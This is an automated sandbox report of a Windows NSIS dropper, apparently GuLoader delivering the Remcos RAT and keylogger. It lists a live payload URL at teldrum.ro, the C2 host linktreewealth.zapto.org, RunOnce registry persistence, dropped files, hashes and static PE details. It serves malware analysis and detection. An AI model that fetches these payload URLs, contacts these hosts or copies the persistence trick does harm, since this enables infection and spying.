http://nsis.sf.net/NSIS_ErrorError	x6yDsHJ9tr.exe, 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmp, x6yDsHJ9tr.exe, 00000000.00000000.2092615557.000000000040A000.00000008.00000001.01000000.00000003.sdmp, x6yDsHJ9tr.exe, 00000004.00000000.3369669549.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
https://teldrum.ro/NJrdZqNcCtz102.binZ	x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://teldrum.ro/	x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://teldrum.ro/&	x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.226.229.209	linktreewealth.zapto.org	Hong Kong		36351	SOFTLAYERUS	true
109.99.162.14	teldrum.ro	Romania		9050	RTDBucharestRomaniaRO	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590938
Start date and time:	2025-01-14 15:39:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	x6yDsHJ9tr.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	4e8d586a950492c30147b7d56bcfad49cd577966
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/10@17/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 84% Number of executed functions: 46 Number of non-executed functions: 35
Cookbook Comments:	Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:42:58	API Interceptor	1067937x Sleep call for process: x6yDsHJ9tr.exe modified
15:42:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat
15:42:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
43.226.229.209	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse
109.99.162.14	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse
	DHL_119040 receipt document,pdf.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.W32.MSIL_Kryptik.HRZ.genEldorado.12789.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
teldrum.ro	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	109.99.162.14
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
linktreewealth.zapto.org	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	43.226.229.209

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RTDBucharestRomaniaRO	arm7.elf	Get hash	malicious	Mirai	Browse	109.102.20.98
	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	4.elf	Get hash	malicious	Unknown	Browse	193.231.241.68
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	92.83.30.89
	3.elf	Get hash	malicious	Unknown	Browse	109.99.173.54
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	109.99.162.14
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	ppc.elf	Get hash	malicious	Mirai	Browse	92.87.162.218
SOFTLAYERUS	spc.elf	Get hash	malicious	Unknown	Browse	169.50.198.158
	arm5.elf	Get hash	malicious	Unknown	Browse	165.192.205.133
	mpsl.elf	Get hash	malicious	Unknown	Browse	169.52.8.120
	meth5.elf	Get hash	malicious	Mirai	Browse	161.202.248.213
	meth15.elf	Get hash	malicious	Mirai	Browse	216.40.224.50
	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	43.226.229.209
	elitebotnet.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	103.56.222.75
	https://www.facebook.com/share/1A9gt2P1af	Get hash	malicious	Unknown	Browse	52.116.53.155
	res.sh4.elf	Get hash	malicious	Unknown	Browse	184.172.25.27

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	183643586-388657435.07.exe	Get hash	malicious	Unknown	Browse	109.99.162.14
	Handler.exe	Get hash	malicious	DanaBot, Vidar	Browse	109.99.162.14
	sysadmin.exe	Get hash	malicious	Vidar	Browse	109.99.162.14
	JUbmpeT.exe	Get hash	malicious	Vidar	Browse	109.99.162.14
	149876985-734579485.05.exe	Get hash	malicious	Nitol	Browse	109.99.162.14
	149876985-734579485.05.exe	Get hash	malicious	Unknown	Browse	109.99.162.14

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse
	https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exe	Get hash	malicious	Unknown	Browse
	RFQ_BDS636011.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	CERTIFICADO TITULARIDAD.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Created / dropped Files

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	3.3991347456360272
Encrypted:	false
SSDEEP:	3:rglsKl63rwl55JWRal2Jl+7R0DAlBG4moojklovDl6v:Mlsel55YcIeeDAlS1gWAv
MD5:	72EB6AB8CA73E62124FDF6BEC3BC06CE
SHA1:	3EBFBE2B886E78E2B342AEBC714F6598544B761A
SHA-256:	F04CEA4D262A917002FCA023F61B0104C98166C316766AFFEE6252577609C077
SHA-512:	8C46EC5DB35B823CF38CC915EC8A1421DD63F03D53BE9B13F2E2AB6CC9CB35351B09DFAE359295E9FEFDBE1AE6C873DA3EA5557BAA8A18E34717138AA1200DD8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.5./.0.1./.1.4. .0.9.:.4.2.:.2.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Temp\Setup.ini

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.0536606896881855
Encrypted:	false
SSDEEP:	3:8+dB4WYiTNvn:8AbYiTNvn
MD5:	08CA75DA54EB4810D18796C97F510A55
SHA1:	3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
SHA-256:	E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
SHA-512:	46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Bus Clock]..Gats=Galse..

C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	550217
Entropy (8bit):	7.712228071105721
Encrypted:	false
SSDEEP:	6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
MD5:	25EEC63EDF7C0EB8628A89712B5CB363
SHA1:	4E8D586A950492C30147B7D56BCFAD49CD577966
SHA-256:	E075807417590255DE4D395FA3DFBC336E88C96BBAB8AFCA1D5E5D5ABBAC0237
SHA-512:	086FEB119E2A02F2FD7AFC45C422F9B472F049EB2E79F83769F25254D88A84086275D2CFF1E891D360EA57978292CD0CAF958E4000CD659AC532165E1F881DFB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.805604762622714
Encrypted:	false
SSDEEP:	192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
MD5:	4ADD245D4BA34B04F213409BFE504C07
SHA1:	EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
SHA-256:	9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
SHA-512:	1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: ZAMOWIEN.BAT.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: RFQ_BDS636011.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: CERTIFICADO TITULARIDAD.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsuD809.tmp

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	data
Category:	dropped
Size (bytes):	1091527
Entropy (8bit):	3.7883797592579986
Encrypted:	false
SSDEEP:	12288:qvZYo2Z5DAmaghhFm2YqtP4lIxgBVLpadBoS9CR:8YdJagOWP4EeVLeOF
MD5:	714AB9E19CCDB0A431DB45B3EFD1D462
SHA1:	C61D1E403FDF00B6FC47481D1C56BE7368A496E7
SHA-256:	2B9B7C3E4EA530F8AE338734ED61B365F0A124687EE88BEAE57E07259B0DCE66
SHA-512:	A6E108B4787A8EA44BC6187960FBEC6B5C7954ED6695060C4BE8A88B579928CA31E4E30501374F9F896DEF92438EE1A04C2DBDA6CD4255E24587DE4741595F0B
Malicious:	false
Preview:	........,...................X...d.......d...................................................................................................................................................................................................................................................G...Y...........q...j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet\bttefulde.tox

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
Category:	dropped
Size (bytes):	267655
Entropy (8bit):	1.2559804952290619
Encrypted:	false
SSDEEP:	768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
MD5:	F6A4342C9271CFFEF29695EEA330941E
SHA1:	291ABCFA507BA730832511E5F47EAA2CB4DFABBD
SHA-256:	605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
SHA-512:	D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
Malicious:	false
Preview:	...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Daystars216.tre

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	data
Category:	dropped
Size (bytes):	114454
Entropy (8bit):	1.2519787240577294
Encrypted:	false
SSDEEP:	768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
MD5:	F85E20AA1A28EEFFC89F744F6B6B67B3
SHA1:	B61AEF131017C5605647983CE2D55769914BB104
SHA-256:	C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
SHA-512:	EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
Malicious:	false
Preview:	...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Skvinge18.alt

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	data
Category:	dropped
Size (bytes):	310550
Entropy (8bit):	1.2527719188567612
Encrypted:	false
SSDEEP:	1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
MD5:	72FA348549D0BD9CE66E5F3EBA54DF3A
SHA1:	D5B4797D07374226CD8173964DF8753F4ABB9E6E
SHA-256:	7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
SHA-512:	D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
Malicious:	false
Preview:	...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................\|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................\|....................................r.............................W.............................................X.....................................................q.................

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Vaelger.Abr

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	data
Category:	dropped
Size (bytes):	83152
Entropy (8bit):	4.590487128538397
Encrypted:	false
SSDEEP:	1536:mPpv9Hyk6GJxFF88oQTFd5xzmxgxAVH3r2gnnAOpuIg:mPpvdys0xQT/5m9SJEuIg
MD5:	3B9A97DDA581FFCEB29B192F228D66DF
SHA1:	A11D7ADCC7A283B75D217A27724324F53FB91540
SHA-256:	F783B047374C53913141CAFDE79B94B7C0D3AEA69AE86EA4417D7C8EB7798529
SHA-512:	13BD775B3FF31F2127C28D26942DE8235EFE96AF4E2A921DBD82C813B53167E7B3E331A7F45178A77E65C2EF9CDA0D25DEAD6C775FFEC0F0E8CAD45DCB0DDF7E
Malicious:	false
Preview:	..UU...........K....]]]]]...FF...6.........g....++.....D.....;.s.:..//..d..O....AAA....=._...........;;;..........W............................888.......L.....CCC...............66..../..........vvv.........q..................C....<<<..................e..............-......qq..*.D.......00...%....""".======.#........................................'.........C.........UU..............L...^.......+............222.333.kkk.MMMMMMMMMM....................Q............ll.........hh.........ss.......>.........E......%%%..........................MM.................................... ...........:...........................Y.................[................................ ...........55555......<<<<.?.........//....D.Y.$$.............I..%.....................-..zz..sss.......=.........333.................KK.........JJ...................R...'.....................X..9....XXXXXXXXX.Z.......S...S......I...77.............eeeee....w...................................................v..gg.....222.

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\gramaries.Ove

Download File

Process:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
File Type:	data
Category:	dropped
Size (bytes):	295959
Entropy (8bit):	7.608537202687179
Encrypted:	false
SSDEEP:	6144:WH4o5aBQ0lz5DJimagdvhT7lmfp8Fpzkc1PlKQl4ZPIxo4+V6GVS2paf:WYo2Z5DAmaghhFm2YqtP4lIxgBVLpaf
MD5:	5B2D5C7C1482936796C2699166B34424
SHA1:	493E890B6548A54DDADB5D450797BBE68429502C
SHA-256:	A7C9A3BE29FACF27782B90B0E6EE7D6B645CD7F827C6475BFD19A6480D0890EA
SHA-512:	3983BFC12B10AB6C26BF3D070CAA9960C6F6DF07D48BB27318C984BD2CA56CF310050E0ED40A8E11E284B70413B01773DF7F5178216953AF5A5E47E4F7A89368
Malicious:	false
Preview:	.#............H.......................xxx.$............@..W.......dd..............................dddd...MM.........qq...........u.....PP...............A.............!!!.```.....BBBBBBB.999..........+......................X.n.....11.g........W.........y.....fff....-.........,..<<<....s........EEE........................AAA...w.CCC.......j.......^.!.w...ZZZZZZ....................................._.....___.............@@..........................ww...uuuuuu.C..............f...22..........E.:...........4..-......e.........ww...<<<<. ...........................B..f.....TT.7777..............www.....T.cc..xx.`....f..33...I...<<<<....tttt........Q...J.......................000..&.TT......==......A........jjj..M.ss........BBB.....DD.~~.........LLLLL.C.,..........r..........EE......................;........gg.....????..M.*.............==.....b..............J................................cc.............Y.U....E.....yyy.. ....AA..C......=....qqqqqq..............K.llll......bbb...@.?..........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.712228071105721
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	x6yDsHJ9tr.exe
File size:	550'217 bytes
MD5:	25eec63edf7c0eb8628a89712b5cb363
SHA1:	4e8d586a950492c30147b7d56bcfad49cd577966
SHA256:	e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
SHA512:	086feb119e2a02f2fd7afc45c422f9b472f049eb2e79f83769f25254d88a84086275d2cff1e891d360ea57978292cd0caf958e4000cd659ac532165e1f881dfb
SSDEEP:	6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
TLSH:	D9C4F1E4E210C1A7E25F5D38DAB169F11D80BC38D1E1087B43507EA9F4B2A2599EF91F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....

File Icon


Icon Hash:	4571753721719a8d

Static PE Info

General

Entrypoint:	0x403645
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9dda1a1d1f8a1d13ae0297b47046b26e

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A230h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A0h]
mov esi, dword ptr [004080A4h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F98EC7F5FEAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F98EC7F5FB8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429B18h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4a000	0x18858	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66b7	0x6800	e65344ac983813901119e185754ec24e	False	0.6607196514423077	data	6.4378696011937135	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	bd82d08a08da8783923a22b467699302	False	0.4431640625	data	5.103358601944578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb78	0x600	caa377d001cfc3215a3edff6d7702132	False	0.5091145833333334	data	4.126209888385862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x20000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4a000	0x18858	0x18a00	73bbe3fdd1585fbd610b24874590b455	False	0.22416322969543148	data	5.2980000367452575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4a418	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.14908908079971608
RT_ICON	0x5ac40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.27520746887966807
RT_ICON	0x5d1e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3553001876172608
RT_ICON	0x5e290	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.48667377398720685
RT_ICON	0x5f138	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.43934426229508194
RT_ICON	0x5fac0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.569043321299639
RT_ICON	0x60368	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 672	English	United States	0.5552995391705069
RT_ICON	0x60a30	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.18841463414634146
RT_ICON	0x61098	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4869942196531792
RT_ICON	0x61600	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.598404255319149
RT_ICON	0x61a68	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.26344086021505375
RT_ICON	0x61d50	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 384	English	United States	0.3094262295081967
RT_ICON	0x61f38	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.42905405405405406
RT_DIALOG	0x62060	0x100	data	English	United States	0.5234375
RT_DIALOG	0x62160	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x62280	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x622e0	0xbc	data	English	United States	0.601063829787234
RT_VERSION	0x623a0	0x174	data	English	United States	0.5860215053763441
RT_MANIFEST	0x62518	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
